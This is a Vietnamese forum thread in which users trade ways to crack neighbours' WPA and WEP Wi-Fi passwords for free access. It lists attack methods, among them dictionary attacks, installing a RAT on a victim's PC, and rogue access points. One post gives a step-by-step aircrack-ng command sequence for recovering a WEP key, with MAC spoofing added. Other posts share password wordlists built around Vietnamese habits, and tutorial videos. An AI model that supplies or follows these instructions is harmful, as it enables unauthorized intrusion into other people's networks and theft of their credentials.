nguyentoanhy

có bạn nào vừa từng hack thành công wifi WPA chưa vậy, giúp mình với. chỗ mình nhiều Wifi nhưng chẳng vào được cái nào, cái vào được thì mạng như S***. Giúp mình với nhé

Herlbert

Hack được thì cũng không ai chỉ cho bạn đâu.Nhưng mà chắc chắn ở VN không ai hack được WPA.

linhkent0501

sao lại hack được thì không ai chỉ, quan trọng là tất cả người sẻ chia cho nhau. Ví dụ như hack WEP thì mình vừa hack được rồi. còn WPA thì chưa. VN thì mình biết có người hack được WPA rồi đấy, bạn đừng nghĩ VN kém. mình có đọc qua mấy bài viết hack WPA nhưng khó hiểu quá làm không được
baba10 Hack được thì cũng không ai chỉ cho bạn đâu.Nhưng mà chắc chắn ở VN không ai hack được WPA.

atrangbeo266

Cái này chỉ có tìm pass bằng backtrack thui. Không hack được đâu. . Nhà mình cũng có mấy cái WPA2 khóa nhưng ngại không dò

hoanglinh_kha

đa số không hack được vì data từ điển chỉ có nước ngoài thôi, BT5 phụ thuộc trên data đó để hack mà.

No ăn thua đâu, mình thử rồi, cắm máy hơn hai tháng trời ------------> No Find

---------- Bài thêm lúc 15:12 ---------- Bài trước là lúc 15:10 ----------

mà cũng tùy ăn may, ví dụ nó đặt admin123456 hay guestabcd thì còn được, nói chung 1 ăn được, 9 thua

---------- Bài thêm lúc 15:18 ---------- Bài trước là lúc 15:12 ----------

Xin thưa các anh em , hiện tại có 4 cách hack WPA+WPA2 mà dân hacker dang dùng

List of methods:

1. Dictionary attack (sử dụng Dictionary dể tra pass hay còn gọi là sổ số kiến thiết ,hên xui )

2. Bruteforce attack (cách này thì perfect ,pass cỡ nào tra cũng ra => thời (gian) gian tìm ra pass thì lâu vô cùng ,tùy vào dộ dài hay dộ khó của pass)

3. RAT+Wirelesskeyview combo attack (cách này thì tựacoi nhưcài Keylogger vào máy victim ,mà con RAT này lợi hại hơn KeyLog ở chỗ là mình có thể điều khiển máy victim => lấy cắp pass rất dễ) . Cách này mà bị police bắt thì truy ra 2 tội (a.dột nhập máy trái phép / b.ăn cắp WIFI trái phép )

4. Rogue AP attack (cách này nghe tụi hacker bảo là khả thi nhất và dễ lấy pass nhất .Nhưng cách này dòi hỏi phải có kiến thức nhiều về mạng ,vì cách thức hoạt dộng là tạo một AP giả mạo ,sau đó Victim kết nối vào và nó require password again ,sau khi victim type vào thì pass sẽ chuyển về cho mình.)

TIN VUI CHO CÁC ANH EM ^^!

Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng wifi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.

Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập wifi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận rõ hơn hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.

Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật (an ninh) đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hay sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng lớn hơn và chỉ mất có 60 giây.

Các bộ định tuyến sử dụng hệ thống bảo mật (an ninh) đã gặp nhiều vấn đề bảo mật (an ninh) trong thời (gian) gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật (an ninh) Nhật Bản vừa một lần nữa đánh lên hồi chuông thông báo độ bảo mật (an ninh) trên các bộ định tuyến Wi-Fi.

Theo VnMedia (PC World)

"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI

DÙNG CHO MỌI HỆ ĐIỀU HÀNH

bước 1 downnload BACKTRACK 4 beta

KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD

bước 2 download tài liệu về --> dành cho những bạn KẾT hiểi rõ về cấu trúc của nó

mediafire

CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX HACK LIỀN

LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU

1.BT 4 beta

2.để tự động boot không chỉnh bất cứ dòng nào

3.login:root

4.pass:toor

5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu

CÁC BẠN LÀM THEO DÒNG LỆNH SAU

1.iwconfig-->xem tên card mình đang dùng

mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn

2.airmon-ng

3.airmon-ng stop wlan0

4.airmon-ng start wlan0

5.airodump-ng --ivs --write capturefile wlan0

6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0

7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0

8.airCr-ack-ng -b {ap bssid}

thế là vừa có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)

lượng DATA tối thiểu nên chờ là 40 000 nha các bạn

CHANGE mac NẾU CẦN THIẾT

change mac) thực hiện theo các lệnh sau

-(...) tên interface như WLAN0 chẳng hạn

airmon-ng

airmon-ng stop ...

iconfig ... down

macchanger --mac 00:11:22:33:44:55 ...

airmon-ng start ...

và khi vừa monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn không cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc

have fun

bác nào khi chạy iwconfig không có thông tin card wifi của mình thì nên vào:

những hardware chạy dc trên BT4

những hardware hông hỗ trợ trên BT4

vô đó search theo loại card mà mình sử dụng, không nên phải đăng kí để search

ĐÂY LÀ ĐOẠN CLIP MANG TÍNH THAM KHẢO VÀ CÓ THỂ KHÁC TÀI LIỆU (ko đáng kể ^^!)

ketnooi.com/forum

[/QUOTE]

+nê1u ai không hiểu bước nào cứ nhắn vào ,mình sẽ chỉ đến khi lấy được key thôi , (và mình sẽ không chịu trách nhiệm khi các bạn được police mời đi uống trà đá )

1 VÀI DICTIONARY CHO NHỮNG AI HACK WPA & WPA2

Code:

18M

Code:

74MB

Code:

78MB

lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down

còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng vừa vài GB rồi

Code:

Dictionary from thanhbien_84

thanhbien_84

Mình xin đóng lũy link download từ điển để dò password wifi mà mình sưu tầm được, trong đó có cả từ điển Việt Nam và nước ngoài:

ten + nam sinh (vietnam)

password list 09xxxxxxxxx ( )

Password list ngay thang nam sinh ( )

link download DICTIONARY:

28GB wordlist ( )

huge_wordlist ( )

link tong hop nuoc ngoai:

chi tiet tung phan:

Collection of Wordlist v.2

HuegelCDC:

Naxxatoe-Dict-Total-New:

ahttp://www.mediafire.com/download.php?twdlv7tf9f0xbdg

Purehates Word list:

theargonlistver1:

theargonlistver2:

theargonlistver2-v2 (word.lst.s.u.john.s.u.200)

WordList Collection

wordlist-final

wordlists-sorted

wpalist

WPA-PSK WORDLIST (40 MB)

WPA-PSK WORDLIST 2 (107 MB)

WPA-PSK WORDLIST 3 Final (13 GB)

-=Xploitz=- Vol 1 - PASSWORD DVD

-=Xploitz=- Vol 2 - Master Password Collection

17-in-1

18-in-1

18-in-1 [WPA Edition]

day nua:

* OpenWall:

o

o

o

* (broken link. Does anyone have it hosted elsewhere?)

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

* (broken link. Does anyone have it hosted elsewhere?)

* By operat0r

o

o

o

*

*

link dung luong nho:

thanhbien_84

Có rất nhiều bạn hỏi mình về từ điển cũng như cách hack, quả thật nếu trình bày thì rất dài dòng. Hôm nay mình tiếp tục upload cho các bạn một số video về hack wifi chỉ dẫn cơ bản về sử dụng phần mềm VMWARE và hack bằng tiếng việt, mình vừa theo đó và làm thành công

link download của bạn đây:

hoac link nay:
- Cr-ack Wifi Key WPA2 With BackTrack 4 Final.flv
- Run Backtrack 4 Beta in Windows with VmWare Workstation.flv
- Run Backtrack 4 Beta in Windows with VmWare Workstation_2.flv
wifi khoa boi WPA tieng viet.avi

NGOÀI RA CÒN CÓ THÊM HÀNG CHUC PHẦN MỀM HACK KHÁC

THAM KHẢO TẠI :

NHỚ THANKS MÌNH NHÁ , ^^!

NOTE---WPA,WPA2

Hi,

tui hay lang thang thấy các diễn đàn có nhiều người hỏi về Cr-ack passwork wirless để xài chùa, và có rất nhiều bài chỉ dẫn làm điều đó, chủ yếu dùng airCr-ack trên *nix và Abel & Cain trên Windows hay BACKTRACK. Bản thân thôi chỉ mới thử dùng airCr-ack trên Ubuntu để thử dò cái pass của nhà bên cạnh và lên cơ quan dò thử (cả 2 đều dùng WPA). Kết quả đều là con số 0. Sau đó tui nhận ra rằng để dò được pass thì trong dictionary phải có cái pass đó thì mới có cơ may. Mà ở VN thường có kiểu đặt pass theo kiểu nói trại đi, biến từ biến ngữ, ví dụcoi như:

- kute, cut3, kut3 (cute)

- 9girls, nic3girls (nice girls)

- d0g (dog)

- ...

Với kiểu nói và viết như vậy và khi đặt pass cũng đặt như vậy thì tui dám khẳng định chuyện Cr-ack pass WPA là không thể. tui vừa từng thử với bộ từ điển search được trên mạng có size là 10 Mb (file text mà 10 Mb thì thử hình dung nó chứa bao nhiêu từ ) mà cũng không dò được pass. Bên cạnh đó với kiểu đặt theo strong password có chữ số, ký tự đặc biệt, vd :

- emkut3@^_^

- |-|3L0 |-|@c|<3r (Hello hacker)

- ..

Thì tui dám chắc chắn chuyện Cr-ack password WPA là chuyện viễn vông nếu mong muốn ra ngay kết quả ! hay phải có 1 nhóm tập trung các passwork "made in VN" thì mới đáp ứng được.

Vậy các bạn vui lòng cho biết, trong các bạn ai vừa từng Cr-ack được pass wireless WPA và pass là gì ?

Hy vọng bài viết này sẽ dập tắt được mơ tưởng về chuyện Cr-ack pass wireless WPA của đa số người khi xem các bài tut, các video demo chuyện Cr-ack thấy ngon lành lắm, nhưng không để ý là vừa số pass trong các bài tut đó đều rất đơn giảncoi như123456, 123456789...

Thân

---------------------------------------------------------------------------------------------

NHỮNG BÀI ĐƯỢC LƯU Ý

nggianglx

mình có 1 tử điển được tích hợp các cách đặt password của người việt... nhưng dung lượng của nó thì khiếm đảm.... 25GB.... chẳng biết chép vào đâu cho vừa, làm sao up lên cho anh em cùng thử. Từ điển này là do 1 giáo viên ở trung tâm an ninh mạng Athena viết trước khi ông ấy sang USA làm chuyện và định cư. Đây có lẽ là tài liệu duy nhất và độc nhất ở VN

Mình thấy BT rất tốt đấy bạn àh. nó là bộ công cụ dùng để Pentest hệ thống tốt nhất hiện nay đó. Nó tích hợp rất nhiều công cụ để bạn kiểm tra mức độ an ninh của hệ thống mạng của bạn. Mình có bộ tài liệu nghiên cứu nó, bạn có thể tham khảo trang web

Bí kiếp Offensive Security 101

Part 1:

Part 2:

Part 3:

part 4:

Pass Unrar:

Mình cũng tìm được từ Itlab thôi

Các chủ đề có liên quan khác